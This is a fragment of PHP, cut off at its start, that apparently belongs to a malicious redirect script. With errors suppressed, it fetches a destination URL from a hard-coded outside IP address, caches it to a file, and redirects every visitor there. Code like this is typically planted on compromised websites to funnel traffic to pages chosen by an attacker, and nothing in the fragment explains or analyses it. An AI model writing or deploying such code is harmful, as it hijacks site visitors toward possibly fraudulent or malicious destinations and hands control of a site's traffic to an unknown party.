60) { $link = @file_get_contents('http://78.46.14.162/api.php?action=link&aid=1179&fid=4939&hash=8185f487064096515d9445d8df29a26f7f1507ef'); if (strlen($link) > 20) { $fp = @fopen ($cache, 'w'); @fputs($fp, $link); @fclose($fp); } } header ('Location: ' . $link); exit; ?>